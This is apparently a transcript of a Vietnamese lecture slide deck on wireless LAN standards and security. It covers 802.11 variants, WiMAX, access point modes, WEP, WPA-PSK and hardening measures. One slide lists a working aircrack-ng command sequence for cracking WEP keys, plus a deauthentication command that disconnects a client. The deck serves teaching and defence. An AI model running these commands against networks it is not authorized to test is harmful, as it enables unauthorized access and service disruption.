wire less
DESCRIPTION
TRANSCRIPT
Mạng không dây và Bảo mật
Nội dung
Giới thiệu mạng không dây
802.11 Wireless LAN
Bảo mật trong Wireless LAN
WEP và bẻ khóa WEP
Giới thiệu WPA và WPA-PSK TKIP
Giải pháp bảo mật Wireless LAN
Giới thiệu Mạng không dây
Mạng không dây và chuẩn 802.11
Một số chuẩn không dây 802.11
Chuẩn Tần số Tốc độ Ghi chú
802.11a ~ 5 GHz ≤ 54 Mbps Không tương thích với hai
chuẩn b và g
802.11b ~ 2.4 GHz ≤ 11 Mbps Tương thích chuẩn g
802.11g ~ 2.4 GHz ≤ 54 Mbps Tương thích chuẩn b
802.11n ≥ 250 Mbps Hỗ trợ MIMO (MultiIn,MultiOut)
802.11e Phân mức độ ưu tiên lưu thông: dữ liệu cần thời gian
thực (tín hiệu hình, gọi VoIP) truyền trước dữ liệu kém
quan trọng hơn (mail, web)
802.11i Tăng bảo mật: thêm mã hóa và điều khiển truy cập
WiMAX(Worldwide Interoperability for Microwave Access)
WiMAX, chuẩn 802.16, tương tự Wi-Fi (802.11a, b, g) về khái niệm nhưng có cải tiến nâng cao hiệu suất và kết nối xa hơn
Tốc độ truyền dữ liệu 75 Mbps
Tầm phủ sóng 2 → 10 km
Là công nghệ không dây băng thông rộng đang được thử nghiệm
Ưu điểm của Wireless LAN
Khả năng mở rộng quản lý cao
tránh được tình trạng khó đi dây
Tính linh động
sử dụng mạng mọi nơi
Hỗ trợ nhiều loại thiết bị cầm tay
Tiết kiệm chi phí thiết lập các đường mạng
trong tòa nhà và chi phí bảo dưỡng
Nhược điểm của Wireless LAN
Phức tạp trong thiết lập, quản lý và vận
hành mạng
Thông tin truyền trên không trung với tần
số dùng chung, gây nhiễu và bảo mật
Tốc độ chưa so sánh được với Wired
LAN
Giá thành
802.11 Wireless LAN
Thông số định hình một Wireless LAN
Chuẩn mạng không dây
802.11 a / b / g / e / n / i
Kênh truyền (channel)
Mỹ: 11 kênh; Châu Âu: 13 kênh; Nhật: 14 kênh
SSID (Service Set Identifier)
Tên của Wireless LAN
Các thành phần trong Wireless LAN
Card mạng không dây
PCI, USB, PCMCIA
Access Point
Router không dây
Chế độ làm việc của Access Point
Chế độ gốc (AP root mode)
Chế độ client (Client mode)
Infrastructure
Ad-hoc
Chế độ cầu nối (Bridge mode)
Chế độ lặp (Repeater mode)
AP root mode
AP client
Repeater
Bridge
Outdoor wireless
- Mô hình mạng không dây ngoài trời(tt)- Hoạt động ở băng tầng 2.4Ghz, 5,8 Ghz và kết hợp với
nhiều dạng antenna: parabol, yagi, Pannel, Omni để mở rộng khoảng cách và hướng sóng
- Tốc độ 54Mbps hay 11Mbps- Triển khai ở những vị trí không thể đi dây như cảng,
trường học, khu vui chơi hay nhà xưởng.Ứng dụng:- Kết nối giữa các Building với nhau, trung tâm và chi
nhánh văn phòng.- Kết nối mạng ở những khu vực sân bãi: trường học,
cảng, sân bay.- Dùng là điểm truy cập internet(HostPot)
Outdoor wireless
Antenna
AP outdoor Antenna
Bảo mật trong Wireless LAN
Định hình Wireless LAN
Secu
rity
Th
reat
Bắt dữ liệu trong Wireless LAN không bảo mật
Secu
rity
Th
reat
Chứng thực trong chế độ không bảo mật
Các chế độ bảo mật
WEP
WPAEnterprise
Personal (WPA-PSK)
WPA2
Chứng thực khóa chia sẻ (Shared Key)
Bảo mật với WEP (Wired Equivalent Privacy)
Secu
rity
Th
reat
Bẻ khóa WEP với aircrack
airmon-ng start rausb0 11
airodump-ng –c 11 –w out rausb0
aireplay-ng -1 0 –e 802.11g-AP –a 00:12:0e:36:6e:43
–h 11:22:33:44:55:66 rausb0
aireplay-ng -3 -b 00:12:0e:36:6e:43
–h 11:22:33:44:55:66 –x 600 rausb0
aircrack-ng –n 64 out.cap
Tắt kết nối với card chipset RT2500
aireplay-ng –0 0
–a 00:12:0e:36:6e:43
–c 00:15:e9:af:44:3f rausb0
Bảo mật với WPA-PSK TKIP(WiFi Protected Access – PreShared Key
Temporal Key Integrity Protocol)
Sử dụng per-packet key
Tăng khoảng-sử-dụng của IV từ 24 bits
thành 48 bits
Cải tiến CRC bằng Message Integrity
Code (MIC) key
Secu
rity
Th
reat
Giải pháp bảo mật Wireless LAN
Thay đổi thông số mặc định
SSID (Service Set Identifier)
Kênh truyền (channel)
Mật khẩu cho phép cấu hình AP
Lọc (Filtering)
Lọc SSID
Không sử dụng SSID mặc định hay có liên
quan đến tổ chức
Không quảng bá SSID
Lọc địa chỉ MAC
Lọc giao thức
Bảo mật với WEP và WPA / WPA2
Sử dụng công cụ và thiết bị bảo mật
Thực hiện bảo mật định kỳ
Bảo vệ mạng ở mức vật lý
Tài liệu tham khảo
Lee Barken, How Secure Is Your Wireless Network? Safeguarding Your Wi-Fi LAN – Chapter 3 4 5, 2003, Prentice Hall PTR, ISBN: 0-13-140206-4
International Council of Electronic Commerce Consultants, Ethical Hacking (EC-Council Exam 312-50): Student Courseware – Module 15, 2004, OSB, ISBN: 0972936211
Matthew Gast, 802.11 Wireless Networks The Definitive Guide, 2005, O'Reilly
Micheal Sutton, Hacking the Invisible Network, 2002 iDEFENSE Labs, http://www.idefense.com
Daniel V. Hoffman, Essential Wireless Hacking Tools